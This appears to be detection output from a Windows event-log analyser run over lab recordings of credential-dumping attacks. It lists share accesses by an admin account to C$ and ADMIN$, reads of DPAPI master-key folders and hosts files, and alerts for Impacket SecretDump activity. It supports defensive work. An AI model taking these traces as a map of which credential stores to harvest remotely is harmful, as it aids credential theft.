+2021-12-12 16:16:05.850 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.866 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.881 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.897 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.912 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Drivers\etc\hosts | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.928 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.944 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:05.959 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 20:53:07.706 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:08.857 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\oyCCGQai.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:08.857 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.310 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\AqdQWnLE.tmp | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.310 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.601 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.617 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\1d0d5e15-3dd4-4689-a6c8-b3f4a523f317 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.632 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\4940c1c2-798b-4291-9cbf-56ba1bc56acd | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.648 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1111\dd10a8dd-2e01-4512-9e4e-0ab8b174b115 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.663 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.680 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.685 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.685 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Protect\S-1-5-21-4230534742-2542757381-3142984815-1234\eca8ffbf-fcd6-4e81-a424-36116606541f | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.716 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\084aa96d-4fd0-4004-802f-dad10353ce8b | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.732 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\0f51cf18-7e42-4905-a5e2-4dcd2016ba02 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\48f8844f-6a0e-44cc-b4c9-4b6aeb83bdcd | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
+2021-12-12 20:53:11.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\Microsoft\Protect\S-1-5-18\5dd255ba-fb23-45a9-8f1c-3efe30e43a08 | IP Addr: 10.23.123.11 | LID: 0x883836e,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx
